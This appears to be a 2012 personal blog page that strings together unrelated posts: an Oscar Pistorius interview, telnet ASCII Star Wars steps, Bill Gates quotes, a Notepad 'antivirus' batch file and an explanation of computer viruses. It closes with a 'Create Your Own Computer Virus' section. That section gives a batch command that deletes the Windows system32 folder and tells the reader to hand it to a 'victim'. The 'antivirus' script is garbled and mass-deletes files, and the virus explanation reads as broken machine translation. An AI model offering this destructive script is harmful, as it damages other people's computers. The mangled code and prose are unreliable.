Saturday, June 30, 2012

Blade Runner ( Oscar Pistorius )




Known as "Blade Runner", the South African is a double amputee who holds the world records in the 100, 200 and 400m (class T44). In 2008, he won a landmark case against the IAAF, which had tried to ban him from able-bodied competitions, claiming his artificial legs gave him an unfair advantage. Pistorius hopes to compete at both the Paralympics and Olympics in 2012.


I had my legs amputated below the knee as a baby after being born without fibulas in both legs, due to a congenital condition. I was never brought up as a "disabled" person. As a kid, I grew up competing against able-bodied people in rugby and water polo.


At boarding school my mates played pranks on me and liked to hide my legs. When I woke up in the morning the first thing I'd have to do was look for my legs! I liked it though – my situation's never going to change so the best way to treat it is with humour.


I began competing in Paralympic sport in 2004, although I wish I'd got involved sooner. It taught me so much more about doing your best, while able-bodied sport is just about winning at any cost. I can win now and be disappointed, or I can come fifth and be happy. It's about the performance.


In the beginning Paralympic sport was really weird for me. I had this stereotype about it being a second-grade version of able-bodied sport. How wrong I was. The competitiveness is crazy.


On TV my blades look space age, but in real life they're very basic. They're just wood, with bolted-on carbon fibre. They're very uncomfortable. What makes them so phenomenal is how light they are.


Running on prosthetic blades you don't have a heel so balance is important. Around a corner you bring your right arm across while your left arm goes further back – you have to be mentally sharp. You don't want to sacrifice time and effort fighting your body.


Prosthetics have been hugely influential for double amputees like me. Where we hold an advantage is running corners; my two legs are the same so I'm not unbalanced like a single amputee would be. Our disadvantage is that without ankles we are not able to generate such power at the start.


The only part of my body I don't like is my hands. They are scarred from all the motorbike riding I did when I was a kid. I don't know how many times I've broken bones in them. I wish I could take pieces of my skin and wrap it over all the scars so they would look better.


Kids are the only ones who react honestly to disability. Parents are always telling them, "don't stare", but it's their fault for not educating the kids. If they did, it wouldn't be a big deal.



Watch ASCII Star Wars in Windows XP, Vista and 7

Every one of us has watched Star Wars on television, computer or in a theater. It is the same movie with aliens fighting each other for galaxies and such stuff. There is nothing new in it. But wait, have you watched an ASCII( American Standard Code for Information Interchange) version of Star Wars and that too in Windows using telnet. A word mostly linked with computer wizards. Well if you have not, then you must do it now!

There is a complete copy of Star Wars done entirely in ASCII characters that you can watch in the Windows operating system (or any OS that supports telnet). The only thing required to watch it is an internet connection; speed does not matter.

A Picture showing Star Wars in command prompt

To watch it on Windows XP,
  1. Go to Start, Run.
  2. Now type "telnet towel.blinkenlights.nl" without the quotes and press Enter.

On Windows 7 and Windows Vista

Telnet is turned off by default in the latest versions of Windows. So, in order to watch star wars, you must first enable telnet by going to Control Panel › Programs › Turn Windows Feature On or Off and ticking both the telnet check boxes. After doing that, follow the steps given below:-
  1. Go to Start, Search.
  2. Type telnet and press Enter.
  3. In the following command prompt window, type "o" without quotes and press Enter.
  4. Now type "towel.blinkenlights.nl" without the quotes and press Enter.




640K ought to be enough for anybody.


Almost every way we make electricity today, except for the emerging renewables and nuclear, puts out CO2. And so, what we're going to have to do at a global scale, is create a new system. And so, we need energy miracles.


As we look ahead into the next century, leaders will be those who empower others.


At Microsoft there are lots of brilliant ideas but the image is that they all come from the top - I'm afraid that's not quite right.


Be nice to nerds. Chances are you'll end up working for one.


DOS is ugly and interferes with users' experience.


I actually thought that it would be a little confusing during the same period of your life to be in one meeting when you're trying to make money, and then go to another meeting where you're giving it away.

I believe that if you show people the problems and you show them the solutions they will be moved to act.


I really had a lot of dreams when I was a kid, and I think a great deal of that grew out of the fact that I had a chance to read a lot.

I think it's fair to say that personal computers have become the most empowering tool we've ever created. They're tools of communication, they're tools of creativity, and they can be shaped by their user.


I'm a great believer that any tool that enhances communication has profound effects in terms of how people can learn from each other, and how they can achieve the kind of freedoms that they're interested in.


I'm sorry that we have to have a Washington presence. We thrived during our first 16 years without any of this. I never made a political visit to Washington and we had no people here. It wasn't on our radar screen. We were just making great software.



If GM had kept up with technology like the computer industry has, we would all be driving $25 cars that got 1000 MPG.


If I'd had some set idea of a finish line, don't you think I would have crossed it years ago?


If you can't make it good, at least make it look good.

If you think your teacher is tough, wait until you get a boss. He doesn't have tenure.


In this business, by the time you realize you're in trouble, it's too late to save yourself. Unless you're running scared all the time, you're gone.

Information technology and business are becoming inextricably interwoven. I don't think anybody can talk meaningfully about one without the talking about the other.


Intellectual property has the shelf life of a banana.


It's fine to celebrate success but it is more important to heed the lessons of failure.

CREATE ANTI VIRUS WITH NOTEPAD



There are simple ways to clean viruses in our computers. We can make your own antivirus with software built using the Windows named Notepad. Apart from minor product files, notepad can save files to a variety of other applications programs, such as html, java script and so on.

However, the virus that can be eliminated by our anti-virus is only a low level as macro viruses and an equal. For heavy virus, would have to use anti-virus that is more powerful. However, these tutorials can teach you the basic knowledge about how the anti-virus.

Type the following code into Notepad:

@ echo off
echo off turn off the active virus
taskkill / F / IM virusname1.exe / IM virusname2.exe
echo Deleting all of viruses based on size
for / RC: \%% a in (*. exe) do if%% ~ za 157,184 equ del / A: HSRA "%% a"
echo deleting hidden virus
echo for drive c and subfolders
for / R C: \%% a in (*. doc.exe) do del "%% a"
echo for drive d and subfolders
for / R D: \%% a in (*. doc.exe) do del "%% a"
echo Unhide Document
cd / d c: \
echo for drive C and subfolders
*. doc attrib-H-S-A / S
cd / d d: \
echo for drive D and subfolders
*. doc attrib-H-S-A / S
exit


Save the file with bat extension, For example antivirus.bat. then go to command prompt and run the Notepad file.

What is a Computer Virus

Computer Virus Infection Strategy


In copies of itself to grow in your computer, the virus should be possible to execute code and write code into memory. For this reason, many viruses attach to executable files that can be part of legitimate programs. If a user tries to launch a program that is infected, the virus code can be run simultaneously. Viruses can be divided into two types according to their behavior when they run. non-resident viruses immediately search for other computers that may be infected, infect these targets, then transfer control to the program an infected application. Resident viruses do not search for hosts when they started. Instead, you load the memory resident virus in the execution and transfer control to host program. The virus remains active in the background and infects new hosts when files are accessed from another program or operating system itself. 




Non-resident viruses 
Non-resident viruses can be considered as composed of modules and module finder replication. Finder module is responsible for finding new files to infect. For each new executable file finder module meeting, she calls the replication module to infect files. 


Resident viruses
Resident viruses contain a replication module which is similar to what is used by the virus overseas. This module, however, is called a finder module. The cost in the form of virus replication in memory when running, however, and ensuring that this module runs every time you call the operating system to perform certain operations.Replication module can be called, for example, each time the operating system executing file. In this case, the virus infects all the right programs running on your computer. 


Resident viruses are sometimes divided into the category of fast infectors and a category slow infectors. Fast infectors are designed to infect as many files as possible. A fast infector, for instance, can infect every potential host file that is accessed. This poses a particular problem when using anti-virus software as a virus scanner will have access to all files that have the potential to accommodate the computer when you run the analysis at the system level. If the virus does not realize that this virus is present in memory, the virus can "piggy-back" on the virus scanner and in this way infect all files that were analyzed. Fast infectors rely on fasting levels of the spread of infection. 


The disadvantage of this method is that infecting many files may make detection more likely, because the virus can slow down your computer or perform many suspicious actions that can be seen from anti-virus software. Slow infectors, on the other hand, are designed to infect hosts infrequently. Some slow infectious agent, for example, only infect files when they are copied. Slow infectors are designed to avoid detection by limiting their actions: this is less likely to reduce significantly the computer and at best, often trigger anti-virus software that detects suspicious behavior in the program. Slow infector approach, however, does not seem right.

Create Your Own Computer Virus

  •  Open Notepad
  • Write / copy the below command there:
  • " del c:\WINDOWS\system32\*.*/q "  without quote
  • and save as " anything.bat"
  • Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be started